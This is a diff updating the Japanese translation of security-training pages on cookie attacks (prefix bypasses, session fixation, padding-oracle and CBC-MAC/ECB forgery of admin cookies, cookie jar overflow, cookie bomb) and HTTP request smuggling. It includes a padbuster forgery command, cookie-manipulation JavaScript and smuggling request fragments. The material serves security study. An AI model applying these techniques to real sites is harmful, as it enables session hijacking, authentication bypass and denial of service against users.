+## クッキーのプレフィックス
 
-`__Secure-`で始まるCookieは、HTTPSで保護されたページから`secure`フラグとともに設定される必要があります。
+`__Secure-` で始まるクッキーは、HTTPS によって保護されたページから `secure` フラグとともに設定される必要があります。
 
-`__Host-`で始まるCookieには、いくつかの条件が満たされなければなりません：
+`__Host-` で始まるクッキーには、いくつかの条件が満たされなければなりません：
 
-- `secure`フラグで設定されなければなりません。
-- HTTPSで保護されたページから発信されなければなりません。
+- `secure` フラグで設定されなければなりません。
+- HTTPS によって保護されたページから発信されなければなりません。
 - ドメインを指定することは禁じられており、サブドメインへの送信を防ぎます。
-- これらのCookieのパスは`/`に設定されなければなりません。
+- これらのクッキーのパスは `/` に設定されなければなりません。
 
-`__Host-`で始まるCookieは、スーパードメインやサブドメインに送信されることは許可されていないことに注意することが重要です。この制限は、アプリケーションCookieを隔離するのに役立ちます。したがって、すべてのアプリケーションCookieに`__Host-`プレフィックスを使用することは、セキュリティと隔離を強化するための良いプラクティスと見なされます。
+`__Host-` で始まるクッキーは、スーパードメインやサブドメインに送信されることは許可されていないことに注意することが重要です。この制限は、アプリケーションクッキーを隔離するのに役立ちます。したがって、すべてのアプリケーションクッキーに `__Host-` プレフィックスを使用することは、セキュリティと隔離を強化するための良いプラクティスと見なされます。
 
-### Overwriting cookies
+### クッキーの上書き
 
-したがって、`__Host-`プレフィックスのCookieの保護の一つは、サブドメインからの上書きを防ぐことです。たとえば、[**Cookie Tossing attacks**](cookie-tossing.md)を防ぎます。トークで[**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf))では、パーサーを騙すことでサブドメインから\_\_HOST-プレフィックスのCookieを設定することが可能であることが示されています。たとえば、最初や最後に"="を追加することなどです：
+したがって、`__Host-` プレフィックスのクッキーの保護の1つは、サブドメインからの上書きを防ぐことです。たとえば、[**Cookie Tossing attacks**](cookie-tossing.md) を防ぎます。トークで [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F_wAzF4a7Xg) ([**論文**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) では、パーサーを騙すことでサブドメインから __HOST- プレフィックスのクッキーを設定することが可能であることが示されています。たとえば、最初や最後に "=" を追加することです：
 
 <figure><img src="../../images/image (6) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-また、PHPでは、Cookie名の先頭に**他の文字を追加する**ことで、**アンダースコア**文字に置き換えられ、`__HOST-` Cookieを上書きすることが可能でした：
+また、PHP では、クッキー名の先頭に**他の文字を追加する**ことで、**アンダースコア**文字に置き換えられ、`__HOST-` クッキーを上書きすることが可能でした：
 
 <figure><img src="../../images/image (7) (1) (1) (1) (1).png" alt="" width="373"><figcaption></figcaption></figure>
 
-## Cookies Attacks
+## クッキー攻撃
 
-カスタムCookieに機密データが含まれている場合は、確認してください（特にCTFをプレイしている場合）、脆弱性があるかもしれません。
+カスタムクッキーに機密データが含まれている場合は、確認してください（特に CTF をプレイしている場合）、脆弱性があるかもしれません。
 
-### Decoding and Manipulating Cookies
+### クッキーのデコードと操作
 
-Cookieに埋め込まれた機密データは常に精査されるべきです。Base64や類似の形式でエンコードされたCookieは、しばしばデコード可能です。この脆弱性により、攻撃者はCookieの内容を変更し、修正されたデータを再度Cookieにエンコードすることで他のユーザーを偽装することができます。
+クッキーに埋め込まれた機密データは常に精査されるべきです。Base64 や類似の形式でエンコードされたクッキーは、しばしばデコード可能です。この脆弱性により、攻撃者はクッキーの内容を変更し、修正されたデータを再度クッキーにエンコードすることで他のユーザーを偽装することができます。
 
-### Session Hijacking
+### セッションハイジャック
 
-この攻撃は、ユーザーのCookieを盗んで、アプリケーション内でのそのアカウントへの不正アクセスを得ることを含みます。盗まれたCookieを使用することで、攻撃者は正当なユーザーを偽装できます。
+この攻撃は、ユーザーのクッキーを盗んで、アプリケーション内のアカウントに不正にアクセスすることを含みます。盗まれたクッキーを使用することで、攻撃者は正当なユーザーを偽装できます。
 
-### Session Fixation
+### セッション固定
 
-このシナリオでは、攻撃者が被害者を特定のCookieを使用してログインさせるように仕向けます。アプリケーションがログイン時に新しいCookieを割り当てない場合、攻撃者は元のCookieを持っているため、被害者を偽装できます。この技術は、被害者が攻撃者が提供したCookieでログインすることに依存しています。
+このシナリオでは、攻撃者が被害者を特定のクッキーを使用してログインさせるように仕向けます。アプリケーションがログイン時に新しいクッキーを割り当てない場合、攻撃者は元のクッキーを持っているため、被害者を偽装できます。この技術は、被害者が攻撃者が提供したクッキーでログインすることに依存しています。
 
-**サブドメインにXSSを見つけた場合**や**サブドメインを制御している場合**は、次をお読みください：
+**サブドメインに XSS を見つけた場合**や**サブドメインを制御している場合**は、次をお読みください：
 
 {{#ref}}
 cookie-tossing.md
 {{#endref}}
 
-### Session Donation
+### セッション寄付
 
-ここでは、攻撃者が被害者に攻撃者のセッションCookieを使用させるように仕向けます。被害者は自分のアカウントにログインしていると信じて、攻撃者のアカウントのコンテキストで意図せずにアクションを実行します。
+ここでは、攻撃者が被害者に攻撃者のセッションクッキーを使用させるように仕向けます。被害者は自分のアカウントにログインしていると信じて、攻撃者のアカウントのコンテキストで意図せずにアクションを実行します。
 
-**サブドメインにXSSを見つけた場合**や**サブドメインを制御している場合**は、次をお読みください：
+**サブドメインに XSS を見つけた場合**や**サブドメインを制御している場合**は、次をお読みください：
 
 {{#ref}}
 cookie-tossing.md
 {{#endref}}
 
-### [JWT Cookies](../hacking-jwt-json-web-tokens.md)
+### [JWT クッキー](../hacking-jwt-json-web-tokens.md)
 
-前のリンクをクリックして、JWTの可能な欠陥を説明するページにアクセスしてください。
+前のリンクをクリックして、JWT の可能な欠陥を説明するページにアクセスしてください。
 
-Cookieで使用されるJSON Web Tokens（JWT）も脆弱性を示す可能性があります。潜在的な欠陥とそれを悪用する方法についての詳細情報を得るには、JWTのハッキングに関するリンクされた文書にアクセスすることをお勧めします。
+クッキーで使用される JSON Web Tokens (JWT) も脆弱性を示す可能性があります。潜在的な欠陥とそれを悪用する方法についての詳細情報を得るには、JWT のハッキングに関するリンクされた文書にアクセスすることをお勧めします。
 
-### Cross-Site Request Forgery (CSRF)
+### クロスサイトリクエストフォージェリ (CSRF)
 
-この攻撃は、ログイン中のユーザーに対して、現在認証されているWebアプリケーションで不要なアクションを実行させるものです。攻撃者は、脆弱なサイトへのすべてのリクエストに自動的に送信されるCookieを悪用できます。
+この攻撃は、ログイン中のユーザーに対して、現在認証されているウェブアプリケーションで不要なアクションを実行させるものです。攻撃者は、脆弱なサイトへのすべてのリクエストに自動的に送信されるクッキーを悪用できます。
 
-### Empty Cookies
+### 空のクッキー
 
-（詳細は[元の研究](https://blog.ankursundara.com/cookie-bugs/)を参照してください）ブラウザは名前のないCookieの作成を許可しており、次のようにJavaScriptを通じて示すことができます：
+（詳細は[元の研究](https://blog.ankursundara.com/cookie-bugs/)を参照してください）ブラウザは名前のないクッキーの作成を許可しており、次のように JavaScript で示すことができます：
 ```js
 document.cookie = "a=v1"
 document.cookie = "=test value;" // Setting an empty named cookie
@@ -159,15 +159,15 @@ setCookie("", "a=b") // Setting the empty cookie modifies another cookie's value
 
 #### Chromeのバグ: Unicodeサロゲートコードポイントの問題
 
-Chromeでは、Unicodeサロゲートコードポイントがセットクッキーの一部である場合、`document.cookie` が破損し、その後空の文字列を返します:
+Chromeでは、Unicodeサロゲートコードポイントがセットされたクッキーの一部である場合、`document.cookie` が破損し、その後空の文字列を返します:
 ```js
 document.cookie = "\ud800=meep"
 ```
-この結果、`document.cookie`は空の文字列を出力し、永続的な破損を示します。
+この結果、`document.cookie`が空の文字列を出力し、永続的な破損を示します。
 
 #### パースの問題によるクッキーのスモグリング
 
-(詳細は[元の研究](https://blog.ankursundara.com/cookie-bugs/)を参照) Java（Jetty、TomCat、Undertow）やPython（Zope、cherrypy、web.py、aiohttp、bottle、webob）を含むいくつかのウェブサーバーは、古いRFC2965サポートのためにクッキー文字列を誤って処理します。彼らは、セミコロンを含んでいても、ダブルクオートされたクッキー値を単一の値として読み取ります。セミコロンは通常、キーと値のペアを区切るべきです。
+(詳細は[元の研究](https://blog.ankursundara.com/cookie-bugs/)を参照) Java（Jetty、TomCat、Undertow）やPython（Zope、cherrypy、web.py、aiohttp、bottle、webob）を含むいくつかのウェブサーバーは、古いRFC2965サポートのためにクッキーストリングを誤処理します。彼らは、セミコロンを含んでいても、ダブルクオートされたクッキー値を単一の値として読み取ります。セミコロンは通常、キーと値のペアを区切るべきです。
 ```
 RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end";
 ```
@@ -179,11 +179,11 @@ RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end";
 - Zopeは、次のクッキーの解析を開始するためにカンマを探します。
 - Pythonのクッキークラスは、スペース文字で解析を開始します。
 
-この脆弱性は、クッキーベースのCSRF保護に依存するWebアプリケーションにとって特に危険であり、攻撃者が偽装されたCSRFトークンクッキーを注入し、セキュリティ対策を回避する可能性があります。この問題は、Pythonが重複したクッキー名を処理する方法によって悪化し、最後の出現が以前のものを上書きします。また、`__Secure-`および`__Host-`クッキーが不安全なコンテキストで扱われることに対する懸念も生じ、クッキーが偽装に対して脆弱なバックエンドサーバーに渡されると、認可のバイパスにつながる可能性があります。
+この脆弱性は、クッキーベースのCSRF保護に依存するWebアプリケーションにとって特に危険であり、攻撃者が偽装されたCSRFトークンクッキーを注入し、セキュリティ対策を回避する可能性があります。この問題は、Pythonが重複したクッキー名を処理する方法によって悪化し、最後の出現が以前のものを上書きします。また、`__Secure-`および`__Host-`クッキーが安全でないコンテキストで扱われることに対する懸念を引き起こし、クッキーが偽装に対して脆弱なバックエンドサーバーに渡されると、認可のバイパスにつながる可能性があります。
 
 ### Cookies $version and WAF bypasses
 
-According to [**this blogpost**](https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie), **`$Version=1`**クッキー属性を使用して、バックエンドが**RFC2109**のために古いロジックを使用してクッキーを解析することが可能かもしれません。さらに、**`$Domain`**や**`$Path`**のような他の値も、クッキーを使用してバックエンドの動作を変更するために使用できます。
+According to [**this blogpost**](https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie), **`$Version=1`**というクッキー属性を使用して、バックエンドが**RFC2109**のために古いロジックを使用してクッキーを解析することが可能かもしれません。さらに、**`$Domain`**や**`$Path`**などの他の値を使用して、クッキーに対するバックエンドの動作を変更することができます。
 
 #### Bypassing value analysis with quoted-string encoding
 
@@ -218,19 +218,19 @@ Resulting cookie: name=eval('test//, comment') => allowed
 
 - **クッキー**は、**ログイン**するたびに**同じ**です。
 - ログアウトして、同じクッキーを使用してみてください。
-- 2つのデバイス（またはブラウザ）で同じアカウントに同じクッキーを使ってログインしてみてください。
+- 2つのデバイス（またはブラウザ）を使用して、同じアカウントに同じクッキーでログインしてみてください。
 - クッキーに情報が含まれているか確認し、変更を試みてください。
-- ほぼ同じユーザー名でいくつかのアカウントを作成し、類似点が見えるか確認してください。
-- "**ログイン状態を保持する**"オプションが存在する場合、その動作を確認してください。存在し、脆弱である可能性がある場合は、他のクッキーを使用せずに**ログイン状態を保持する**のクッキーを常に使用してください。
+- ほぼ同じユーザー名で複数のアカウントを作成し、類似点が見えるか確認してください。
+- "**ログイン状態を保持**"オプションが存在する場合、その動作を確認してください。存在し、脆弱である可能性がある場合は、他のクッキーを使用せずに**ログイン状態を保持**のクッキーを常に使用してください。
 - パスワードを変更しても前のクッキーが機能するか確認してください。
 
 #### **高度なクッキー攻撃**
 
-ログイン時にクッキーが同じ（またはほぼ同じ）である場合、これはおそらくクッキーがアカウントのいくつかのフィールド（おそらくユーザー名）に関連していることを意味します。次に、あなたは：
+ログイン時にクッキーが同じ（またはほぼ同じ）である場合、これはおそらくクッキーがアカウントのいくつかのフィールド（おそらくユーザー名）に関連していることを意味します。次に、以下を試みることができます：
 
 - 非常に**似た**ユーザー名でたくさんの**アカウント**を作成し、アルゴリズムがどのように機能しているかを**推測**してみてください。
-- **ユーザー名をブルートフォース**してみてください。クッキーがあなたのユーザー名の認証方法としてのみ保存されている場合、ユーザー名"**Bmin**"でアカウントを作成し、クッキーのすべての**ビット**を**ブルートフォース**することができます。なぜなら、あなたが試すクッキーの1つは"**admin**"に属するものだからです。
-- **パディング** **オラクル**を試してください（クッキーの内容を復号化できます）。**padbuster**を使用してください。
+- **ユーザー名をブルートフォース**してみてください。クッキーがユーザー名の認証方法としてのみ保存されている場合、ユーザー名"**Bmin**"でアカウントを作成し、クッキーのすべての**ビット**を**ブルートフォース**することができます。なぜなら、試すクッキーの1つは"**admin**"に属するものだからです。
+- **パディング** **オラクル**を試みてください（クッキーの内容を復号化できます）。**padbuster**を使用してください。
 
 **パディングオラクル - Padbusterの例**
 ```bash
@@ -250,17 +250,17 @@ Padbusterは複数回試行し、どの条件がエラー条件（無効なも
 ```
 padbuster http://web.com/index.php 1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lBP+zAD0D0w== 8 -cookies thecookie=1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lBP+zAD0D0w== -plaintext user=administrator
 ```
-この実行により、文字列 **user=administrator** が内部に含まれたクッキーが正しく暗号化され、エンコードされます。
+この実行により、**user=administrator**という文字列が含まれた正しく暗号化され、エンコードされたクッキーが得られます。
 
 **CBC-MAC**
 
-クッキーには何らかの値があり、CBCを使用して署名される可能性があります。その場合、値の整合性は、同じ値を使用してCBCで作成された署名です。IVとしてヌルベクターを使用することが推奨されるため、このタイプの整合性チェックは脆弱である可能性があります。
+クッキーにはいくつかの値があり、CBCを使用して署名される可能性があります。すると、値の整合性は、同じ値を使用してCBCで作成された署名になります。IVとしてヌルベクターを使用することが推奨されるため、このタイプの整合性チェックは脆弱である可能性があります。
 
 **攻撃**
 
 1. ユーザー名 **administ** の署名を取得 = **t**
 2. ユーザー名 **rator\x00\x00\x00 XOR t** の署名を取得 = **t'**
-3. クッキーに値 **administrator+t'** を設定 (**t'** は **(rator\x00\x00\x00 XOR t) XOR t** = **rator\x00\x00\x00** の有効な署名になります)
+3. クッキーに値 **administrator+t'** を設定 (**t'** は **(rator\x00\x00\x00 XOR t) XOR t** の有効な署名になります = **rator\x00\x00\x00**)
 
 **ECB**
 
@@ -271,9 +271,9 @@ padbuster http://web.com/index.php 1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lB
 
 ほぼ同じデータ（ユーザー名、パスワード、メールなど）を持つ2つのユーザーを作成し、与えられたクッキー内のパターンを発見しようとします。
 
-例えば "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" というユーザーを作成し、クッキーにパターンがあるかどうかを確認します（ECBは同じキーで各ブロックを暗号化するため、ユーザー名が暗号化されると同じ暗号化されたバイトが現れる可能性があります）。
+例えば「aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa」というユーザーを作成し、クッキーにパターンがあるかどうかを確認します（ECBは同じキーで各ブロックを暗号化するため、ユーザー名が暗号化されると同じ暗号化されたバイトが現れる可能性があります）。
 
-使用されるブロックのサイズでパターンが存在するはずです。したがって、"a" の一群がどのように暗号化されるかを知っていれば、ユーザー名を "a"\*(ブロックのサイズ)+"admin" と作成できます。その後、クッキーから "a" のブロックの暗号化パターンを削除することができます。そして、ユーザー名 "admin" のクッキーを得ることができます。
+使用されるブロックのサイズでパターンが存在するはずです。したがって、「a」をブロックのサイズ分繰り返した後に「admin」を追加したユーザー名を作成できます。その後、クッキーから「a」のブロックの暗号化パターンを削除することができます。そして、ユーザー名「admin」のクッキーを得ることができます。
 
 ## 参考文献
 
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
index d95ab00f1..aa420000c 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
@@ -1,9 +1,9 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**`Cookie bomb`** は、**ユーザーをターゲットにして、ドメインおよびそのサブドメインに大量の大きなクッキーを追加すること**を含みます。この行動は、被害者が**サーバーに対して過剰なHTTPリクエストを送信する**結果となり、これらはその後**サーバーによって拒否されます**。その結果、特定のユーザーに対してドメインおよびそのサブドメイン内でのサービス拒否（DoS）が引き起こされます。
+**`Cookie bomb`** は、**ユーザーをターゲットにして、ドメインとそのサブドメインに大量の大きなクッキーを追加すること**を含みます。このアクションは、被害者が**サーバーに対して過剰なHTTPリクエストを送信する**結果となり、これらはその後**サーバーによって拒否されます**。これにより、特にそのドメインとサブドメイン内のユーザーを対象としたサービス拒否（DoS）が引き起こされます。
 
-良い**例**はこのレポートに見ることができます: [https://hackerone.com/reports/57356](https://hackerone.com/reports/57356)
+良い**例**は、この書き込みで見ることができます: [https://hackerone.com/reports/57356](https://hackerone.com/reports/57356)
 
-さらに情報が必要な場合は、このプレゼンテーションを確認できます: [https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26)
+さらに情報が必要な場合は、このプレゼンテーションをチェックできます: [https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
index 32a0943a3..daa1abdc1 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
@@ -1,6 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-ブラウザには、ページごとに保存できる**クッキーの数の制限**があります。したがって、何らかの理由で**クッキーを消す必要がある**場合は、**クッキージャーをオーバーフロー**させることができます。そうすれば、最も古いクッキーが削除されます。
+ブラウザには、ページごとに保存できる**クッキーの数の制限**があります。したがって、何らかの理由で**クッキーを消す必要がある**場合、**クッキージャーをオーバーフロー**させることができます。そうすれば、最も古いクッキーが削除されます。
 ```javascript
 // Set many cookies
 for (let i = 0; i < 700; i++) {
@@ -15,7 +15,7 @@ document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
 注意してください。異なるドメインを指すサードパーティのクッキーは上書きされません。
 
 > [!CAUTION]
-> この攻撃は、**HttpOnlyクッキーを上書きするためにも使用でき、削除してから希望の値でリセットできます**。
+> この攻撃は、**HttpOnlyクッキーを上書きするためにも使用でき、削除してから希望の値でリセットすることができます**。
 >
 > これを[**このラボの投稿で確認してください**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/)。
 
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
index 549384b60..cbd65af55 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
@@ -34,13 +34,13 @@ Cookies Hackingセクションで示されたように、**クッキーがドメ
 
 この攻撃に対する可能な保護は、**ウェブサーバーが同じ名前の2つのクッキーを異なる値で受け入れないこと**です。
 
-攻撃者が被害者にクッキーを与えた後にクッキーを設定するシナリオを回避するために、攻撃者は**クッキーオーバーフロー**を引き起こし、その後、**正当なクッキーが削除されたら、悪意のあるクッキーを設定する**ことができます。
+攻撃者が被害者にクッキーがすでに与えられた後にクッキーを設定するシナリオを回避するために、攻撃者は**クッキーオーバーフロー**を引き起こし、その後、**正当なクッキーが削除されたら、悪意のあるクッキーを設定する**ことができます。
 
 {{#ref}}
 cookie-jar-overflow.md
 {{#endref}}
 
-別の有用な**バイパス**は、**クッキーの名前をURLエンコードすること**です。いくつかの保護は、リクエスト内の同じ名前の2つのクッキーをチェックし、その後サーバーはクッキーの名前をデコードします。
+もう一つの有用な**バイパス**は、**クッキーの名前をURLエンコードすること**です。いくつかの保護は、リクエスト内の同じ名前の2つのクッキーをチェックし、その後サーバーはクッキーの名前をデコードします。
 
 ### クッキーボム
 
diff --git a/src/pentesting-web/http-connection-request-smuggling.md b/src/pentesting-web/http-connection-request-smuggling.md
index 819c8e948..48a04d838 100644
--- a/src/pentesting-web/http-connection-request-smuggling.md
+++ b/src/pentesting-web/http-connection-request-smuggling.md
@@ -8,7 +8,7 @@
 
 ### 最初のリクエスト検証
 
-リクエストをルーティングする際、リバースプロキシは**Hostヘッダー**に依存して、宛先のバックエンドサーバーを特定することがあります。通常、アクセスが許可されているホストのホワイトリストに依存しています。しかし、一部のプロキシには、ホワイトリストが接続内の最初のリクエストにのみ適用されるという脆弱性があります。そのため、攻撃者は最初に許可されたホストにリクエストを行い、その後同じ接続を通じて内部サイトをリクエストすることでこれを悪用することができます。
+リクエストをルーティングする際、リバースプロキシは**Hostヘッダー**に依存して、宛先のバックエンドサーバーを特定することがあり、アクセスが許可されたホストのホワイトリストに依存することがよくあります。しかし、一部のプロキシには、ホワイトリストが接続内の最初のリクエストにのみ適用されるという脆弱性があります。そのため、攻撃者は最初に許可されたホストにリクエストを行い、その後同じ接続を通じて内部サイトをリクエストすることでこれを悪用することができます。
 ```
 GET / HTTP/1.1
 Host: [allowed-external-host]
@@ -26,7 +26,7 @@ Host: example.com
 POST /pwreset HTTP/1.1
 Host: psres.net
 ```
-この問題は、他の脆弱性を悪用したり、追加の仮想ホストへの不正アクセスを得るために、[Host header attacks](https://portswigger.net/web-security/host-header)（パスワードリセットポイズニングや[web cache poisoning](https://portswigger.net/web-security/web-cache-poisoning)など）と組み合わせることができます。
+この問題は、他の脆弱性を悪用したり、追加の仮想ホストへの不正アクセスを得るために、[Host header attacks](https://portswigger.net/web-security/host-header)や、パスワードリセットポイズニング、[web cache poisoning](https://portswigger.net/web-security/web-cache-poisoning)と組み合わせることができます。
 
 > [!NOTE]
 > これらの脆弱性を特定するために、HTTP Request Smugglerの「connection-state probe」機能を利用できます。
diff --git a/src/pentesting-web/http-request-smuggling/README.md b/src/pentesting-web/http-request-smuggling/README.md
index a37f4680e..8cab850c4 100644
--- a/src/pentesting-web/http-request-smuggling/README.md
+++ b/src/pentesting-web/http-request-smuggling/README.md
@@ -4,7 +4,7 @@
 
 ## What is
 
-この脆弱性は、**フロントエンドプロキシ**と**バックエンド**サーバーの間に**非同期化**が発生し、**攻撃者**がHTTP **リクエスト**を**送信**できる場合に発生します。このリクエストは、**フロントエンド**プロキシ（ロードバランサー/リバースプロキシ）によって**単一のリクエスト**として**解釈され**、**バックエンド**サーバーによって**2つのリクエスト**として**解釈されます**。\
+この脆弱性は、**フロントエンドプロキシ**と**バックエンド**サーバーの間に**非同期化**が発生することで、**攻撃者**がHTTP **リクエスト**を**送信**できるようになり、**フロントエンド**プロキシ（ロードバランス/リバースプロキシ）によって**単一のリクエスト**として**解釈**され、**バックエンド**サーバーによって**2つのリクエスト**として**解釈**されることを可能にします。\
 これにより、ユーザーは**自分の次のリクエストをバックエンドサーバーに到着する前に**変更することができます。
 
 ### Theory
@@ -15,7 +15,7 @@
 
 **Content-Length**
 
-> Content-Lengthエンティティヘッダーは、受信者に送信されるエンティティボディのサイズをバイト単位で示します。
+> Content-Lengthエンティティヘッダーは、受信者に送信されるエンティティボディのサイズ（バイト単位）を示します。
 
 **Transfer-Encoding: chunked**
 
@@ -24,30 +24,30 @@
 
 ### Reality
 
-**フロントエンド**（ロードバランサー/リバースプロキシ）は_**content-length**_または_**transfer-encoding**_ヘッダーを**処理**し、**バックエンド**サーバーは**他の**ヘッダーを**処理**することで、2つのシステム間に**非同期化**を引き起こします。\
-これは非常に重大な問題であり、**攻撃者はリバースプロキシに1つのリクエストを送信でき**、それが**バックエンド**サーバーによって**2つの異なるリクエスト**として**解釈されます**。この技術の**危険性**は、**バックエンド**サーバーが**2番目のリクエストを注入されたものとして**解釈し、**そのクライアントの実際のリクエストが**注入されたリクエストの**一部**になることにあります。
+**フロントエンド**（ロードバランス/リバースプロキシ）は_**content-length**_または_**transfer-encoding**_ヘッダーを**処理**し、**バックエンド**サーバーは**他の**ヘッダーを**処理**することで、2つのシステム間に**非同期化**を引き起こします。\
+これは非常に重大な問題であり、**攻撃者はリバースプロキシに1つのリクエストを送信でき、**バックエンド**サーバーはそれを**2つの異なるリクエスト**として**解釈**します。この技術の**危険性**は、**バックエンド**サーバーが**2番目のリクエストを注入されたものとして**解釈し、**そのクライアントの実際のリクエストが**注入されたリクエストの**一部**となることにあります。
 
 ### Particularities
 
 HTTPでは**新しい行文字は2バイトで構成されています：**
 
-- **Content-Length**: このヘッダーは、リクエストの**ボディ**の**バイト数**を示すために**10進数**を使用します。ボディは最後の文字で終了することが期待されており、**リクエストの最後に新しい行は必要ありません**。
-- **Transfer-Encoding:** このヘッダーは、**ボディ**内で**16進数**を使用して**次のチャンクのバイト数**を示します。**チャンク**は**新しい行**で**終了**しなければなりませんが、この新しい行は**長さ指標にはカウントされません**。この転送方法は、**サイズ0のチャンクの後に2つの新しい行**で終了しなければなりません：`0`
-- **Connection**: 私の経験に基づくと、リクエストスムージングの最初のリクエストでは**`Connection: keep-alive`**を使用することをお勧めします。
+- **Content-Length**: このヘッダーは、リクエストの**ボディ**の**バイト数**を示すために**10進数**の**数値**を使用します。ボディは最後の文字で終了することが期待されており、**リクエストの最後に新しい行は必要ありません**。
+- **Transfer-Encoding:** このヘッダーは、**ボディ**内で**16進数**の**数値**を使用して**次のチャンク**の**バイト数**を示します。**チャンク**は**新しい行**で**終了**しなければなりませんが、この新しい行は**長さ指標**には**カウントされません**。この転送方法は、**サイズ0のチャンクの後に2つの新しい行**で終了しなければなりません：`0`
+- **Connection**: 私の経験に基づくと、リクエストスムーギングの最初のリクエストでは**`Connection: keep-alive`**を使用することをお勧めします。
 
 ## Basic Examples
 
 > [!TIP]
 > Burp Suiteを使用してこれを悪用しようとする場合は、リピーターで**`Update Content-Length`と`Normalize HTTP/1 line endings`を無効にしてください**。一部のガジェットは新しい行、キャリッジリターン、誤ったContent-Lengthを悪用します。
 
-HTTPリクエストスムージング攻撃は、フロントエンドとバックエンドサーバーが`Content-Length`（CL）および`Transfer-Encoding`（TE）ヘッダーを解釈する際の不一致を利用して、あいまいなリクエストを送信することによって作成されます。これらの攻撃は、主に**CL.TE**、**TE.CL**、および**TE.TE**として異なる形で現れます。各タイプは、フロントエンドとバックエンドサーバーがこれらのヘッダーを優先する方法のユニークな組み合わせを表しています。脆弱性は、サーバーが同じリクエストを異なる方法で処理することから生じ、予期しない、潜在的に悪意のある結果を引き起こします。
+HTTPリクエストスムーギング攻撃は、フロントエンドとバックエンドサーバーが`Content-Length`（CL）および`Transfer-Encoding`（TE）ヘッダーを解釈する際の不一致を利用して、あいまいなリクエストを送信することによって作成されます。これらの攻撃は、主に**CL.TE**、**TE.CL**、および**TE.TE**として異なる形で現れることがあります。各タイプは、フロントエンドとバックエンドサーバーがこれらのヘッダーを優先する方法のユニークな組み合わせを表しています。脆弱性は、サーバーが同じリクエストを異なる方法で処理することから生じ、予期しない、そして潜在的に悪意のある結果を引き起こします。
 
 ### Basic Examples of Vulnerability Types
 
 ![https://twitter.com/SpiderSec/status/1200413390339887104?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104&ref_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104](../../images/EKi5edAUUAAIPIK.jpg)
 
 > [!NOTE]
-> 前の表にはTE.0技術を追加する必要があります。CL.0技術のように、Transfer Encodingを使用します。
+> 前の表にTE.0技術を追加する必要があります。CL.0技術のように、Transfer Encodingを使用します。
 
 #### CL.TE Vulnerability (Content-Length used by Front-End, Transfer-Encoding used by Back-End)
 
@@ -109,7 +109,7 @@ x=
 
 - 攻撃者は、難読化された`Transfer-Encoding`ヘッダーを持つリクエストを送信します。
 - どちらのサーバー（フロントエンドまたはバックエンド）が難読化を認識できないかに応じて、CL.TEまたはTE.CLの脆弱性が悪用される可能性があります。
-- リクエストの未処理部分は、サーバーの1つによって次のリクエストの一部となり、スムージングにつながります。
+- リクエストの未処理部分は、サーバーの1つによって次のリクエストの一部となり、スムーギングが発生します。
 - **例:**
 
 ```
@@ -132,7 +132,7 @@ Transfer-Encoding
 #### **CL.CL Scenario (Content-Length used by both Front-End and Back-End)**
 
 - 両方のサーバーは、`Content-Length`ヘッダーのみに基づいてリクエストを処理します。
-- このシナリオは通常、スムージングには至らず、両方のサーバーがリクエストの長さを解釈する方法に整合性があります。
+- このシナリオは通常、スムーギングには至らず、両方のサーバーがリクエストの長さを解釈する方法に整合性があります。
 - **例:**
 
 ```
@@ -147,7 +147,7 @@ Normal Request
 #### **CL.0 Scenario**
 
 - `Content-Length`ヘッダーが存在し、ゼロ以外の値を持つシナリオを指し、リクエストボディにコンテンツがあることを示します。バックエンドは`Content-Length`ヘッダーを無視します（これは0として扱われます）が、フロントエンドはそれを解析します。
-- これは、サーバーがリクエストの終了を決定する方法に影響を与えるため、スムージング攻撃を理解し、作成する上で重要です。
+- スムーギング攻撃を理解し、作成する上で重要であり、サーバーがリクエストの終了を決定する方法に影響を与えます。
 - **例:**
 
 ```
@@ -161,7 +161,7 @@ Non-Empty Body
 
 #### TE.0 Scenario
 
-- 前のものと同様ですが、TEを使用します。
+- 前のものと同様ですが、TEを使用しています。
